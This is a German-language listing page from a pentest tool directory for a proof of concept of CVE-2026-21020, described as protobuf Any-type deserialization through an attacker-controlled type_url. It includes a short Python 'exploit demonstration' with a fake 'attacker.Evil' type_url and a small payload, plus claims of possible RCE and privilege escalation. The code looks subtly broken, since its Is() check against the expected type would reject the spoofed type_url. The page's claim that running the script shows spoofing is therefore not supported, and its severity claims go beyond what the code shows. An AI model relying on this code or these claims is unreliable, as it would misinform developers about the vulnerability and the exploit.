Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability — PoC für CVE-2026-21020, der die polymorphe Deserialisierung des Protobuf-Any-Typs demonstriert, bei der ein vom Angreifer kontrollierter type_url zu Logikfehlern, Remote-Codeausführung (RCE) oder Privilegienerweiterung führen kann. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability
SchwachstellenanalyseExploitationPenetrationstestsAPI-Sicherheit
GitHubgeorge0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability

CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability

PoC für CVE-2026-21020, der die polymorphe Deserialisierung des Protobuf-Any-Typs demonstriert, bei der ein vom Angreifer kontrollierter type_url zu Logikfehlern, Remote-Codeausführung (RCE) oder Privilegienerweiterung führen kann.

Repository anzeigen
2vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-21020 – Protobuf Message Parsing Polymorphe Deserialisierungs-Schwachstelle

Programmcode (Python mit protobuf)

root@kitploit:~
# proto_vuln.py - Insecure handling of Any type
import addressbook_pb2  # Example protobuf

# Simulated deserialization that trusts an injected type_url
from google.protobuf import any_pb2

any_msg = any_pb2.Any()
any_msg.type_url = "type.googleapis.com/attacker.Evil"
any_msg.value = b'\x0a\x05admin'  # serialized payload

# Application unpacks to expected type but could instantiate arbitrary class if using dynamic loading
if any_msg.Is(addressbook_pb2.Person.DESCRIPTOR):
    person = addressbook_pb2.Person()
    any_msg.Unpack(person)
    print("Person unpacked, but type_url was spoofed!")

CVE-2026-21020 – Protobuf Polymorphe Deserialisierung über Any

Severity: Critical

Übersicht

Ein Dienst verwendet den Any-Typ von Protocol Buffers, um Nachrichten zu kapseln, und entpackt sie dynamisch mithilfe des type_url-Felds, ohne den erwarteten Typ zu validieren. Ein Angreifer kann eine Nachricht mit einer manipulierten type_url senden, die auf eine gefährliche Nachrichtenklasse (oder eine unbeabsichtigte) verweist, was Logikfehler oder Codeausführung verursachen kann.

Details zur Schwachstelle

  • Typ: Deserialisierung nicht vertrauenswürdiger Daten / Typverwechslung
  • Auswirkung: Mögliche RCE oder Privilegieneskalation.
  • Grundursache: Der Server deserialisiert die Nutzlast basierend auf der angreiferkontrollierten type_url ohne Whitelisting.

Exploit-Demonstration

Führen Sie die Simulation aus:

root@kitploit:~
pip install protobuf
python proto_vuln.py

Es zeigt, dass der Any-Typ gefälscht werden kann; wenn der Code die Klasse dynamisch aus type_url lädt, könnte dies zu RCE führen.

Tool herunterladen